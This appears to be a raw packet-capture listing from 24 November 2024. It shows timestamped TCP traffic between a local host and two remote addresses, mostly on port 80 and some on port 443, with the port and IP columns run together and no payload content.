                                                                                                                                                                                        Nov 24, 2024 02:13:26.087831020 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.174587965 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.174673080 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.174721956 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.177428961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.177577972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.177695036 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.182725906 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.184698105 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.184748888 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.184784889 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.190088034 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.190149069 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.190202951 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.195544004 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.195655107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.195700884 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.196697950 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.196880102 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.196942091 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.197035074 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.197046041 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.197053909 CET49726443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.197058916 CET4434972613.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.200829983 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.200849056 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.200952053 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.201096058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.201107979 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.201129913 CET49731443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.201143980 CET4434973113.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.201163054 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.206417084 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.206509113 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.206526041 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.211832047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.211944103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.211975098 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.217255116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.217303991 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.217350006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.222707987 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.222755909 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.222790956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.228168964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.228216887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.228274107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.233647108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.233691931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.233716011 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.239012957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.239073992 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.239104986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.244462967 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.244560957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.244607925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.249880075 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.249954939 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.249980927 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.255461931 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.255508900 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.255676031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.260745049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.260787964 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.275861979 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.275923014 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.276092052 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.276138067 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.276138067 CET49725443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.276150942 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.276163101 CET4434972513.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.278744936 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.278779984 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.278850079 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.278999090 CET49732443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.279011965 CET4434973213.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.338959932 CET4434972813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.339016914 CET4434972813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.339263916 CET49728443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.339263916 CET49728443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.339263916 CET49728443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.341269970 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.341320992 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.341382980 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.341497898 CET49733443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.341514111 CET4434973313.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.385282040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.385345936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.385492086 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.387432098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.387550116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.387598038 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.391872883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.391977072 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.392024040 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.396311998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.396428108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.396476030 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.400762081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.400903940 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.400959015 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.405194998 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.405297995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.408655882 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.408737898 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.408807993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409003973 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409003973 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409023046 CET49727443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409029007 CET4434972713.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409627914 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409735918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.409786940 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.411308050 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.411339045 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.411434889 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.411566019 CET49734443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.411578894 CET4434973413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.414089918 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.414196968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.414266109 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.418548107 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.418772936 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.418834925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.424643040 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.424654961 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.424729109 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.427375078 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.427584887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.427649021 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.431862116 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.431947947 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.431998014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.436274052 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.436395884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.436553955 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.440706968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.440814972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.440865993 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.445158958 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.445272923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.445323944 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.449593067 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.449707985 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.449752092 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.454186916 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.454197884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.454240084 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.459224939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.459234953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.459280014 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.463184118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.463332891 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.463383913 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.467405081 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.467538118 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.467581987 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.471864939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.471992016 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.472038031 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.476233006 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.476353884 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.476402998 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.482074022 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.483077049 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.483128071 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.485332012 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.485466957 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.485512018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.489571095 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.489666939 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.489713907 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.494014025 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.494138002 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.494185925 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.498447895 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.498554945 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.498610973 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.502878904 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.502995014 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.503046036 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.507311106 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.507416964 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.507463932 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.595581055 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.595587015 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.595643997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.597292900 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.597394943 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.597450018 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.600765944 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.601949930 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.602001905 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.602072954 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.605436087 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.605484962 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.605561972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.608764887 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.608809948 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.608897924 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.612137079 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.612184048 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.612185955 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.615318060 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.615365028 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.615418911 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.618552923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.618614912 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.618644953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.621694088 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.621740103 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.621776104 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.624716043 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.624768972 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.624852896 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.627811909 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.627855062 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.627913952 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.630774975 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.630820990 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.630887032 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.633752108 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.633804083 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.633826017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.636889935 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.636938095 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.636960030 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.639609098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.639682055 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.639714956 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.642541885 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.642586946 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.642740011 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.645483017 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.645531893 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.645598888 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.648384094 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.648435116 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.648494005 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.650281906 CET49728443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:26.650295019 CET4434972813.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.651335001 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.651381016 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.651427031 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.654221058 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.654270887 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.654335976 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.657150984 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.657198906 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.657253027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.660118103 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.660165071 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.660257101 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.662991047 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.663049936 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.663398027 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.665884972 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.665987968 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.666007042 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.668771982 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.668818951 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.668952942 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.671705008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.671751022 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.671801090 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.674627066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.674669981 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.674702883 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.677529097 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.677582026 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.677612066 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.680438995 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.680485964 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.680547953 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.683376074 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.683428049 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.683448076 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.686273098 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.686336994 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.686389923 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.689198971 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.689244986 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.689332008 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.692125082 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.692167997 CET4972980192.168.2.5185.215.113.16
                                                                                                                                                                                        Nov 24, 2024 02:13:26.692229986 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.695063114 CET8049729185.215.113.16192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:26.695110083 CET4972980192.168.2.5185.215.113.16
